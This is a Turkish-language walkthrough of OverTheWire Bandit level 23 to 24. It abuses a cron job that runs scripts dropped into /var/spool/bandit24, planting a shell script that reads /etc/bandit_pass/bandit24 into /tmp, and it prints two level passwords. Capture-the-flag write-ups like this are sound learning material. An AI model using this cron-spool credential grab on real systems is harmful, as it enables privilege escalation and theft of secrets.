[ İstenilen ]

Level23 -> Level24

Bir program cron tarafından düzenli aralıklarla zaman temelli iş planlayıcıdan 
otomatik olarak çalışır.Yapılandırma için /etc/cron.d/ dosyasına bakın ve hangi 
dosyanın çalışmakta olduğunu görün.

NOT	: İlk shell-script dosyanızı oluşturmanız gerekir.Bu çok büyük bir adım
ve bu seviyeyi geçtiğinizde kendinizden gurur duymalısınız !

NOT	: Shell-script dosyanızı çalıştırdığınızda kaldırılacaktır.O yüzden 
kopyasını almak sizin için faydalı olucaktır.

[ Çözüm ]

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Step0	: cd /etc/cron.d

Step1	: ls -l 
Output	:
total 92
-r--r----- 1 root root  46 Nov 14  2014 behemoth4_cleanup
-rw-r--r-- 1 root root 355 May 25  2013 cron-apt
-rw-r--r-- 1 root root  61 Nov 14  2014 cronjob_bandit22
-rw-r--r-- 1 root root  62 Nov 14  2014 cronjob_bandit23
-rw-r--r-- 1 root root  61 May  3  2015 cronjob_bandit24
-rw-r--r-- 1 root root  62 May  3  2015 cronjob_bandit24_root
-r--r----- 1 root root  47 Nov 14  2014 leviathan5_cleanup
-rw------- 1 root root 233 Nov 14  2014 manpage3_resetpw_job
-rw-r--r-- 1 root root  51 Nov 14  2014 melinda-stats
-rw-r--r-- 1 root root  54 Jun 25  2016 natas-session-toucher
-rw-r--r-- 1 root root  49 Jun 25  2016 natas-stats
-r--r----- 1 root root  44 Jun 25  2016 natas25_cleanup
-r--r----- 1 root root  47 Aug  3  2015 natas25_cleanup~
-r--r----- 1 root root  47 Jun 25  2016 natas26_cleanup
-r--r----- 1 root root  43 Jun 25  2016 natas27_cleanup
-rw-r--r-- 1 root root 510 Oct 29  2014 php5
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-32
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-64
-rw-r--r-- 1 root root  64 Jul  8  2015 semtex0-ppc
-rw-r--r-- 1 root root  35 Nov 14  2014 semtex5
-rw-r--r-- 1 root root 396 Nov 10  2013 sysstat
-rw-r--r-- 1 root root  29 Nov 14  2014 vortex0
-rw-r--r-- 1 root root  30 Nov 14  2014 vortex20

Step2	:  cat cronjob_bandit24
Output	: * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

Step3	: cat /usr/bin/cronjob_bandit24.sh
Output	:
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
	echo "Handling $i"
	timeout -s 9 60 "./$i"
	rm -f "./$i"
    fi
done

Step4	: cd /var/spool/bandit24

-Burdan sonra işlem yapamadım root izni istiyordu ama çözümüne baktığım zaman
root izni olmadan çözenleri gördüm benden kaynaklanan bir eksiklik olduğunu 
düşünerek çözümü size aktarıyorum ama çözümün kendisini denediğimde zamanda
olmadığını belirtmemde fayda var -

Step5	: mkdir -p /tmp/level24

Step6	: cd /tmp/level24

Step7	: vim a.sh

#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /tmp/level24/bandit24
touch /tmp/level24/ok

Step8	: chmod 777 a.sh

Step9	: cp a.sh /var/spool/bandit24

Step10	: ls

bandit24  ok  sp.sh

Step11	: cat bandit24
Output	: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ











